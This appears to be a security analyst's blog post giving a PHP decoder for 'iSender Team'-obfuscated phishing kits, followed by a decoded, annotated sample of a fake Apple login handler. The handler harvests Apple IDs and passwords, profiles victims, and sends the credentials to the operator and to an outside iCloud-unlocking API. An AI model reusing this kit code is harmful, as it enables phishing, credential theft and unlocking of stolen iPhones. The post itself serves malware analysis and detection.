2022-10-27

"iServer/Powered By iSender Team" decoder

When your iPhone is lost, some attackers set up a fake website that imitates Apple's and message you on WhatsApp or other social media, asking you to reset your password there. The goal is to capture your credentials so they can unlock your iPhone and disable "Find My iPhone".

I examined and decoded the scripts behind some of these fake websites. They steal iCloud data and are obfuscated with a custom PHP encoder called "iServer/Powered By iSender Team".

decoder:
<?php
/*
 * Script to decrypt files encoded with iServer/Powered By iSender Team
*/

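// The decoded payload is attacker-authored PHP/HTML. Serve it as plain text and
// forbid MIME sniffing so a browser displays the source instead of rendering
// any markup or script it contains (as text/html the "<?php" source would also
// be swallowed by the HTML parser rather than shown).
header('Content-Type: text/plain; charset=utf-8');
header('X-Content-Type-Options: nosniff');

// Path of the encoded sample. The decoder only reads this file as text; it
// never include()s or eval()s it.
$file = '/home/user/file.php';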

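/**
 * Return the part of $str that follows $needle.
 *
 * By default the text after the first occurrence is returned; when
 * $last_occurence is anything other than false, the text after the last
 * occurrence is returned instead. If $needle does not occur, $str is
 * returned unchanged.
 *
 * @param string $str            Text to search.
 * @param string $needle         Delimiter to look for.
 * @param bool   $last_occurence Cut after the last occurrence rather than the first.
 *
 * @return string Remainder of $str after the chosen occurrence of $needle.
 */
function str_after($str, $needle, $last_occurence = false)
{
    $pos = ($last_occurence === false)
        ? strpos($str, $needle)
        : strrpos($str, $needle);

    if ($pos === false) {
        return $str;
    }

    // Skip the whole needle, not just its first byte, so multi-character
    // delimiters are removed completely in both modes.
    return substr($str, $pos + strlen($needle));
}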

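// Read the encoded sample as plain text; nothing in it is executed.
$content = file_get_contents($file);
if ($content === false) {
    exit("Cannot read encoded file: {$file}\n");
}

// The loader stores its two substitution alphabets as quoted arguments inside
// an eval(...))) call. Stop early when that call is missing, because the
// extraction below would otherwise work on unrelated text.
if (strpos($content, "eval(") === false) {
    exit("No eval( loader found; the file does not look like an iServer-encoded script.\n");
}
$evalArgs = strstr(str_after($content, "eval("), ")))", true);
if ($evalArgs === false) {
    exit("Loader call is not terminated by ')))'; unexpected encoder layout.\n");
}

// First quoted value after the "','" separator: the characters to translate from.
$afterFirstSep = str_after($evalArgs, "','");
$fromAlphabet = strstr($afterFirstSep, "',", true);

// Second quoted value: the characters to translate to.
$afterSecondSep = str_after($afterFirstSep, "','");
$toAlphabet = strstr($afterSecondSep, "'", true);

if ($fromAlphabet === false || $fromAlphabet === '' || $toAlphabet === false || $toAlphabet === '') {
    exit("Could not extract the two substitution alphabets from the loader.\n");
}

// The payload is the last line of the file: undo the character substitution,
// then base64-decode the result.
$lines = file(str_replace('\\', '/', $file));
if ($lines === false || $lines === []) {
    exit("Encoded file is empty or unreadable: {$file}\n");
}
$payloadLine = array_pop($lines);

$decoded = base64_decode(strtr($payloadLine, $fromAlphabet, $toAlphabet));
if ($decoded === false) {
    exit("Payload line is not valid base64 after substitution.\n");
}

// Printed verbatim. This is attacker-authored code and markup, so view it as
// text (a text/plain response or a terminal), never as rendered HTML.
echo $decoded;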

Put the path to your encoded file here:
// Path to the encoded file you want to decode; the decoder only reads it as text.
$file = '/home/user/file.php';

sample encoded file: 
iServer



decoded:
<?php
/*
 * Analyst annotation (added during review; not part of the decoded kit).
 *
 * What this sample is: the server-side handler behind the fake Apple sign-in
 * page. It receives the victim's Apple ID and password, profiles the visitor,
 * reports the result to the operator and stores the credentials on disk.
 *
 * Visitor profiling
 *   - real_ip() returns X-Forwarded-For, then X-Real-IP, then REMOTE_ADDR. The
 *     first two are client-supplied headers, so the logged IP can be spoofed.
 *   - The IP is sent to http://ip-api.com/json/ (plain HTTP) for country, city,
 *     org, zip and timezone; ip_info() queries the same service.
 *   - getBrowser()/getOS() classify the User-Agent by regex. getOS() has no
 *     break in its loop, so the last matching pattern wins.
 *   - $auth is the text after the last "=" of the Referer header.
 *
 * Credential handling (runs only when POST fields appleID and pw are non-empty)
 *   - "fml.php" is included but not shown; presumably it sets $httpcode and
 *     $myResult, which the branches below read -- TODO confirm.
 *   - Outcome "True Login": a report containing the Apple ID, password and the
 *     profiling data goes to pronot() (defined elsewhere; presumably a bot or
 *     messenger notification -- TODO confirm) and to mail(); autoremove() is
 *     called (PHP function names are case-insensitive, so this is AutoRemove()
 *     below); rows are appended to ../prolink/unlocked.txt and
 *     ../prolink/unlockedemail.txt, the visitor IP to ../blacklist.txt; the
 *     page answers "OK".
 *   - Outcome "False Login": same report, row appended to
 *     ../prolink/failed.txt, mail() sent, the page answers "INVALID".
 *   - Outcome locked Apple ID: report via pronot(), the page answers "INVALID".
 *
 * AutoRemove()
 *   - Passes the Apple ID and password in the query string of
 *     /ickit/ilock.php on the same host, then POSTs them with a hard-coded key
 *     to https://api.ifreeicloud.co.uk and formats the returned account name,
 *     device count and per-device unlock status.
 *
 * Names not defined in this file ($to, $ID, $imei, $ref, $twitter, $telegram,
 * $copy, pronot()) presumably come from ../authid.php or fml.php -- TODO confirm.
 *
 * Artifacts useful for detection and response, all visible below: the strings
 * "Powered By iSender Team", "True Login" and "False Login"; POST parameters
 * appleID and pw; the files unlocked.txt, unlockedemail.txt, failed.txt and
 * blacklist.txt; outbound requests to ip-api.com and api.ifreeicloud.co.uk.
 * The .txt files hold harvested credentials in clear text, so on a recovered
 * host they identify the accounts whose passwords need to be reset.
 */
 $real_ip = real_ip(); $country_ip = ip_info($real_ip, "country"); $city = ip_info($real_ip, "city"); $url = htmlspecialchars($_SERVER["HTTP_REFERER"]); $uri = "#" . $url; $auth = end(explode("=", $url)); $lang = substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2); $IP = real_ip(); $browser = getbrowser(); $os = getos($_SERVER["HTTP_USER_AGENT"]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://ip-api.com/json/" . $IP); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip_data_in = curl_exec($ch); curl_close($ch); $ip_data = json_decode($ip_data_in, true); $country = $ip_data["country"]; $city = $ip_data["city"]; $isp = $ip_data["org"]; $code = $ip_data["zip"]; $timezone = $ip_data["timezone"]; $headers.= 'From: iServer' . ""; $subjects = "True Login"; $subject = "False Login"; include "../authid.php"; if (!empty($_POST["appleID"]) && !empty($_POST["pw"])) { $pass = $_POST["pw"]; $pass = str_replace(array("&"), array("+"), $pass); $pass = str_replace(array("#"), array("%23"), $pass); $id = $_POST["appleID"]; include "fml.php"; if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "Users Enter Correct Data.") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>✅ True Login ✅ 😃
		
📱 Link Code' => " . $ID . $auth. $imei. $ref."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $remove = autoremove($_POST["appleID"], $_POST["pw"]); pronot("", "---------📴 Auto Remove Result---------\n$remove\n"); $file = fopen("../prolink/unlocked.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td><td>$remove$myResult</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../prolink/unlockedemail.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../blacklist.txt","a"); fwrite($file, "$IP"); fwrite($file,"\r\n"); fclose($file); mail($to, $subjects, $messBot, $headers, $remove); echo "OK"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == true && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>❌️ False Login ❌️ 😧

📱 Link Code' => " . $ID . $auth. $imei."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $file = fopen("../prolink/failed.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); mail($to, $subject, $messBot, $headers); echo "INVALID"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == true) { $mess = "<p>🔒 User entered locked Apple ID ❌️</p>"; $mess .= "<p></p>"; $mess .= "<p>🔗 Link Code : " . $auth. "</p>"; $mess .= "<p></p>"; $mess .= "<p>🆔 Apple ID : " . $_POST['appleID'] . "</p>"; $mess .= "<p>🔑 Password : " . $_POST["pw"] . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ⌨ Owner System Info     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>📍 IP Address: " . $IP . "</p>"; $mess .= "<p>📱 Browser : " . $browser . "</p>"; $mess .= "<p>🖥 OS : " . $os . "</p>"; $mess .= "<p>🌐 Dev.Lang : " . $lang . "</p>"; $mess .= "<p>🌏 Country : " . $country . "</p>"; $mess .= "<p>🏙 City : " . $city . "</p>"; $mess .= "<p>📫 Postal Code : " . $code . "</p>"; $mess .= "<p>🕛 Time Zone : " . $timezone . "</p>"; $mess .= "<p>⚡ Connection : " . $isp . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ☎️ Contact US     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>🆔 $twitter</p>"; $mess .= "<p>🆔 $telegram</p>"; $mess .= "<p>$copy</p>"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); echo "INVALID"; } } } } function AutoRemove($id, $pass) { $msg = file_get_contents("https://" . $_SERVER["SERVER_NAME"] . "/ickit/ilock.php?id=" . $id . "&pass=" . 
$pass); $msg = json_decode($msg); $owner_text = $msg->text; $owner_number = $msg->number; $Serial = $msg->newinfo; $myCheck["appleid"] = $id; $myCheck["password"] = $pass; $myCheck["key"] = "6DR-H5K-85D-ASA-FS7-3U8-YCC-MJB"; $myCheck["subscription"] = 1; $myCheck["format"] = "JSON"; $ch = curl_init("https://api.ifreeicloud.co.uk"); curl_setopt($ch, CURLOPT_POSTFIELDS, $myCheck); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $a = json_decode($myResult); $name = $a->name; $count = $a->count; if (0 < $count) { $text = "👤 Name: $name\n\n📱 Total Devices: $count\n\n🔠 Message: $owner_text\n🔢 Lost Mode Number: $owner_number\n\n"; $devices = $a->devices; foreach($devices as $device){ $aname = $device->name; $model = $device->model; $mode = $device->mode; $status = $device->status; $unlocked = $device->unlocked; if($unlocked){ $unlocked = 'Removed 📴 ✅'; } else { $unlocked = 'Unlock Failed 📶 ⛔'; } $text.= "Device Name: $aname\nDevice Model: $model\nDevice Mode: $mode\n$status+$unlocked\n\n"; } $Serials = "--★--Powered By iSender Team--★--\n\n" . $Serial . "\n\n"; return $text . 
$Serials; } else { return "This Apple ID no have devices."; } } else { return "INVALID"; } } function getOS($user_agent) { $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } function getBrowser() { $agent = $_SERVER["HTTP_USER_AGENT"]; $name = "NA"; if (preg_match("/MSIE/i", $agent) && !preg_match("/Opera/i", $agent)) { $name = "Internet Explorer"; } else { if (preg_match("/Firefox/i", $agent)) { $name = "Mozilla Firefox"; } else { if (preg_match("/Chrome/i", $agent)) { $name = "Google Chrome"; } else { if (preg_match("/Safari/i", $agent)) { $name = "Apple Safari"; } else { if (preg_match("/Opera/i", $agent)) { $name = "Opera"; } else { if (preg_match("/Netscape/i", $agent)) { $name = "Netscape"; } } } } } } return $name; } function real_ip() { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (isset($_SERVER["HTTP_X_REAL_IP"])) { return $_SERVER["HTTP_X_REAL_IP"]; } return $_SERVER["REMOTE_ADDR"]; } function ip_info($ip = NULL, $purpose = "location", $deep_detect = true) { $output = NULL; if (filter_var($ip, FILTER_VALIDATE_IP) === false) { $ip = 
$_SERVER["REMOTE_ADDR"]; if ($deep_detect) { if (filter_var($_SERVER["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (filter_var($_SERVER["HTTP_CLIENT_IP"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } } } $purpose = str_replace(array("name", "\n", "\t", " ", "-", "_"), NULL, strtolower(trim($purpose))); $support = array("country", "countrycode", "state", "region", "city", "location", "address"); $continents = array("AF" => "Africa", "AN" => "Antarctica", "AS" => "Asia", "EU" => "Europe", "OC" => "Australia (Oceania)", "NA" => "North America", "SA" => "South America"); if (filter_var($ip, FILTER_VALIDATE_IP) && in_array($purpose, $support)) { $ipdat = @json_decode(@file_get_contents("http://ip-api.com/json/" . $ip)); if (@strlen(@trim($ipdat->countryCode)) == 2) { switch ($purpose) { case "location": $output = array("city" => $ipdat->city, "state" => $ipdat->regionName, "country" => $ipdat->country, "country_code" => $ipdat->countryCode); break; case "address": $address = array($ipdat->countryName); if (1 <= @strlen($ipdat->regionName)) { $address[] = $ipdat->regionName; } if (1 <= @strlen($ipdat->city)) { $address[] = $ipdat->city; } $output = implode(", ", array_reverse($address)); break; case "city": $output = $ipdat->city; break; case "state": $output = $ipdat->regionName; break; case "region": $output = $ipdat->regionName; break; case "country": $output = $ipdat->country; break; case "countrycode": $output = $ipdat->countryCode; break; } } return $output; } return $output; } ?>